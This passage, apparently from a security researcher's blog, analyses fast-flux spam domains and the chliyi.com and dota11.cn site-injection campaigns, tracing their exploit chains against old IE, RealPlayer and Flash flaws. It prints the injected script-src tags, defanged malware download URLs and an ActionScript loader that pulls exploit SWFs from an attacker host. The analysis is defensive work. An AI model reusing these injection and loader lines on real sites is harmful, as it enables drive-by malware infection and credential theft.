areatry.com. 163448 IN NS ns1.er909erede.com.
areatry.com. 163448 IN NS ns1.ijekrii9.com.
areatry.com. 163448 IN NS ns0.er909erede.com.
areatry.com. 163448 IN NS ns0.ijekrii9.com.

As you can clearly see the ttl is 120 seconds and 20 A records are severed up as available for each look up. This is definitely more complex than the pharmacy express spam.

The pharmacy express spam domains I discovered during this run were:

• denvermedicaldoc.sg
• doctordoctorlist.sg
• funmedicaldoctor.sg
• medicaldoc.sg
• medspecialist.sg
• medvisiondoctor.sg
• medwaydoc.sg
• ozmeddoc.sg
• yourrecoverydoc.sg

These domains are also riding on a fast flux network, but only serve up one new A record every 5 minutes. Here is the output for my dig command for the “ozmeddoc.sg” domain:

;; ANSWER SECTION:
ozmeddoc.sg. 590 IN A 204.95.101.99

Don’t get the wrong idea here I am not saying the Pharmacy Express site/domain is any less of a threat or nuisance than the Canadian Pharmacy site/domain, but what I am saying is the fast flux design is simplified for the Pharmacy Express when compared to the Canadian Pharmacy design.

According to my Google searching chliyi.com has successfully been injected onto about ~12,000 sites. This malicious domain is using the well publicized Adobe Flash vulnerability along with a few others. The good news is Symantec Threatcon has retracted their declaration of this being a 0-day exploit, and have since clarified with the help of Adobe this exploit does not work on the newest version of the Flash Player version 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:

As you can see the entry page for this injection is chliyi.com/reg.js using the following code

<script src=hxxp://www.chliyi.com/reg.js>

hxxp://www.chliyi.com/reg.js

This file contains no obfustication, but does contain some interesting logic as you can see.

Obviously if you are using the Chinese language pack you won’t receive any of the malicious code, so I would assume the Authors want to avoid exploiting Chinese clients. With that I also believe that this round of injections was most likely performed be a Chinese organization.

hxxp://www.chliyi.com/img/info.htm

This page is where the obfustication starts. This also starts the decision tree for choosing which exploits to serve to a user being directed to this malicious domain. The first obfustication is done with VBScript and looks like this:

My first deobfustication revealed even more VBScript obfustication and can be seen here:

After the second deobfustication we see the first portion of the decision tree in choosing which exploits to send to the users computer. The first test tries to create an Adobe.Stream object with the clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 classid, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation is successfully the next page that the user is directed to is the help.htm page, and if it is unsuccessfully created the user will be sent over to a serious of exploits to include the highly publicized Flash Player exploit.

hxxp://www.chliyi.com/img/help.htm

The help.htm file is obfusticated with VBScript as well, but defiantly not as complicated. The obfusticated page looked like this:

Deobfusticated it is very clear what vulnerability the Authors are targeting. The MS06-014 vulnerability is an older vulnerability, but it must still have a very good success rate as lots of malicious code is still targeting it. It was only last month that the famous Mpack tool kit stopped including it, so as everyone has said before me keep you systems patched to avoid old vulnerabilities like this one from being exploited on your systems.

If the exploit is successful the user will download hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal results for this are fair with 22/32 (68.75%) which can be seen here: VirusTotal Results. Running this Trojan in my lab it grabbed two more files: FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealer’s. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable for the site authors. Here lately I have started to see a lot more of these types of Trojans, where specific account information is being stolen for gaming sites instead of the normal email and bank info stealer’s.

hxxp://www.chliyi.com/img/flash.swf

This is obviously the Flash player exploit getting so much attention in the last few days. Most of the other sites using this exploit are embedding an Action Script that will actually direct you to load different Flash files using exploits based off your browser. For example most sites will separate the Firefox file from the IE file being used, but this one is not as sophisticated and serves only one flash media file. The flash decompile looks like this using swfdump:

A code extraction attempt using flare showed this:

I am fairly new at deobfusticating Flash files, but what I did notice is there is no action script associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation feel free to send it my way. Also here are the VirusTotal results for Flash.swf.

hxxp://www.chliyi.com/img/real.htm

This is another VBScript obfusticated page, but this time targeting the Real Player (CVE-2007-5601) vulnerability. This is just another example of why system administrators need to pay attention to software updates outside the normal Microsoft Windows and Microsoft Office updates being published once a month. The deobfustication process took two VBScript deobfustications to display the actual JavaScript rendered exploit seen here:

I didn’t include the obfusticated code snapshots as they were actually very large files with to many lines to try and take screen shots that would display properly in this post. If you need them I can send them your way or post them up for download, just ask.

hxxp://www.chliyi.com/img/new.htm

The new.htm file is another attempt at exploiting a known vulnerability in Real Player (CVE-2008-1309). This deobfustication took 2 VBScript decodes to render the following code:

Obviously none of these exploits being severed up by this malicious domain are 0-day’s, so if you will just keep your systems up to date and exercise alittle bit of caution when surfing the internet you should be ok. One obvious plugin I would highly recommend is the NoScript plugin for Firefox, as it will definitely aid in stopping these scripts from executing without your permission. I would also suggest the filtering of the domain names seen in this analysis chliyi.com and jj120.net at the very minimum if you have that capability. Another option would be to block the IPs associated with these domain chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), this sometimes leads to legitimate sites being blocked as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn’t see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.

I also wasn’t surprised at all to see who the registrars for these two hostile domains were as they seem to be very popular with the Malware writing community lately.

Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008

Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009

As always if you have any questions or comments feel free to contact me or leave them here.

SQL and XSS site injections have become a standard for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture into how these types of injections work and the methodologies behind them. First off here is a Site Map for the current mappings of the dota11.cn injection:

As you can see from the Site Map these types of injections server as the gateways to a much larger schema of user tracking, malicious code, and exploit serving web pages and/or scripts. Now let me attempt to walk you through the logic for this schema.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non intrusively redirect you to a statistics gathering server. This will allow the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistical gathering server is located here: web.51.la/go.asp. The other portion of the m.js file contains simple logic to rendor one of two iframe redirections based off your browsers language settings. If you have the Chinese language back configured you will be directed to: windows.loveyoushipin.com/ing/le.htm, and if you don’t have it configured you will be directed to: www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to: www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese Language pack. The le.htm file will attempt to server a Real Player exploit (CVE-2007-5601) to you and more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration gathering script that will submit your information to the statistics gather web server: vip2.51.la/go.asp. Strategically placing these statistic gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source sode here in PDF format: 1662569_js. Source Code and le_htm Source Code

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese Language pack. This file appears to be the most complex piece to this malicious schema with several logically choosen exploits being severed up and is obfusticated to prevent detection and deter analysis. The first attempt at serving up malicious content is targeted at an old vulnerability in the Microsoft Data Access Components (MDAC) Function (MS06-014). If your configuration doesn’t throw an error on the creation of the Adobe.Stream object you will be iframed redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited. If your configuration throws an error a Real Player vulnerability will be probed for. Here is the vulnerability summary information: CVE-2007-5601 and is the same vulnerability that was seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to xxp://www.dota11.cn/rl.htm, where this vulnerability will be attempted to be exploited. If the above Real Player vulnerability probe fails and throws an error you will be iframe redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent Real Player vulnerabilty (CVE-2008-1309). You will also be redirected to hxxp://www.dota11.cn/04.htm which looks like a left behind iframe refrence that the designer forgot to clean up. I say this because I recieved a 404 error when I tryed grabbing this file. The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files although hosted on separate domains contain the exact same content. Both of these are serving up malicious Flash Media files. If your using Internet Explorer you will receive this video: hxxp://www.woai117.cn/4561.swf and for all others you will receive this video: hxxp://www.woai117.cn/4562.swf. Both of these utilize some embedded Action Script logic to redirect you to a malicious Flash Media file based off your Flash media player version. For Internet Explorer users the redirect looks like this: hxxp://www.woai117.cn/ + fVersion + i.swf and for all others it looks like this: hxxp://www.woai117.cn/ + fVersion + f.swf. The following exert is from the Action Script being used:

movie ‘4561.swf’ {
// flash 8, total frames: 1, frame rate: 12 fps, 550×400 px, compressed
frame 1 {
var fVersion = /:$version;
loadMovie(‘hxxp://www.woai117.cn/’ + fVersion + ‘i.swf’, _root);
stop();
}
}

This looks like the same vulnerabilities SANS.org is referencing Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this posting as always feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.